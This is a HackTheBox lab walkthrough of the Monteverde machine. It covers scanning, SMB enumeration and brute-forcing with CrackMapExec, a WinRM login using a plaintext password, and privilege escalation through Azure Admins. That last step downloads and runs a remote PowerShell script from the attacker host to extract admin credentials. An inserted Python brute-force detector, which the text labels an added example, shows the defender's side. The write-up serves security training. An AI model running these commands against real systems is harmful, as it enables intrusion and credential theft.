7. HackTheBox. Level Medium: Monteverde Walkthrough. SMB Brute-Force and LPE via Azure Admins

10 December 2024 3 minutes Author: Lady Liberty

Learn how to hack the Monteverde machine on HackTheBox: port scanning, brute-forcing SMB, using the Azure Admins group to elevate privileges, and gaining admin access.

How to pass HackTheBox Monteverde

In this article, we will brute-force an SMB password and elevate privileges to administrator level using an account that is a member of the Azure Admins group.

The lab is connected via VPN. It is recommended to avoid using your work computer or devices that store sensitive data, as you will be on a private network with other users who have cybersecurity expertise.

Recon

This machine has an IP address of 10.10.10.172, which I add to /etc/hosts.

10.10.10.172    monteverde.htb

First, a scan is performed for open ports. To save time, the initial scan is performed using masscan, as it takes longer to scan all ports with nmap.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.172   --rate=500

There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.

nmap monteverde.htb -p49778,88,593,49667,53,445,5985,49675,9389,3268,49706,389,464,49674,139,636,135,3269,49673

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A monteverde.htb -p88,593,53,445,5985,9389,3268,389,464,139,636,135,3269

First of all, we check SMB. We will do this using enum4linux. This way we will get the users, as well as their group membership.

enum4linux -a monteverde.htb

USER

As usual, a password brute-force runs in parallel while we look for an entry point. Since the password policy requires a minimum password length of 7 characters, the wordlists are prepared accordingly.

Now let’s run the brute-force using CrackMapExec.

cme smb monteverde.htb -u ./users.txt -p ./passwords.txt

Surprisingly, this worked – the user’s credentials were found. Now the resources available to this user are checked.

cme smb monteverde.htb -u SABatchJobs -p SABatchJobs --shares
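Seen from the defender's side, the brute-force above appears on the domain controller (with logon auditing enabled) as a burst of failed logons from one source across many accounts, followed by a success. The following Python check for that pattern is an added example, not part of the original article; the CSV export layout, the thresholds, the sample lines and the account names user-a and user-b are assumptions constructed for illustration.

```python
import csv, io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real log data. Assumed export layout per line:
# time,event_id,account,source_ip  (4625 = failed logon, 4624 = successful logon)
SAMPLE_LOG = """\
2024-12-10T09:58:00,4625,mhope,10.10.10.50
2024-12-10T09:58:20,4624,mhope,10.10.10.50
2024-12-10T10:00:01,4625,mhope,10.10.15.60
2024-12-10T10:00:01,4625,SABatchJobs,10.10.15.60
2024-12-10T10:00:02,4625,user-a,10.10.15.60
2024-12-10T10:00:02,4625,user-b,10.10.15.60
2024-12-10T10:00:03,4625,mhope,10.10.15.60
2024-12-10T10:00:03,4624,SABatchJobs,10.10.15.60
2024-12-10T10:00:04,4625,user-a,10.10.15.60
"""

def find_bruteforce(log_text, min_failures=5, min_accounts=3,
                    window=timedelta(minutes=5)):
    """Flag sources with many failed logons across several accounts in a short
    window, and list accounts that logged on successfully from that source."""
    failed, succeeded = defaultdict(list), defaultdict(list)
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 4:
            continue  # skip blank or malformed lines
        ts, event_id, account, src = row
        bucket = {"4625": failed, "4624": succeeded}.get(event_id)
        if bucket is not None:
            bucket[src].append((datetime.fromisoformat(ts), account))
    alerts = {}
    for src, events in failed.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the start forward until the burst fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            if len(burst) >= min_failures and len({a for _, a in burst}) >= min_accounts:
                alerts[src] = {
                    "failures": len(events),
                    "accounts": sorted({a for _, a in events}),
                    # A success after the burst began suggests a guess landed.
                    "compromised": sorted({a for t, a in succeeded[src] if t >= burst[0][0]}),
                }
                break
    return alerts

if __name__ == "__main__":
    for src, info in find_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```

The single mistyped password from 10.10.10.50 stays below both thresholds, so only the source that cycles through several accounts is reported.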

Let’s turn to the users$ share.

smbclient -U SABatchJobs%SABatchJobs //10.10.10.172/users$

Let’s recursively look at all the files on the server.

And let’s see what’s in the file.

Now we connect to WinRM and retrieve the user flag.

evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

ROOT

We check the user account information.

The user is a member of the Azure Admins group, and this is the LPE vector. We use Azure-ADConnect to connect to the Azure database. We download the script from the local server to the remote machine and execute it.

IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.60/Azure-ADConnect.ps1')
Azure-ADConnect -server 127.0.0.1 -db ADSync

We get the administrator credentials. We connect and pick up the flag.

Full access to the system is provided.

Conclusion

Going through the Monteverde machine on HackTheBox demonstrated how practical cybersecurity skills help to find vulnerabilities and gain control over a system. Step by step, we performed port scanning, password brute-forcing, access rights analysis and elevation of privileges to the administrator level.

This process emphasizes the importance of knowledge in working with network protocols, account vulnerabilities and the specifics of integration with Azure. For cybersecurity professionals, this is not only training in technical skills, but also an important lesson in the value of protecting their systems from such attacks.
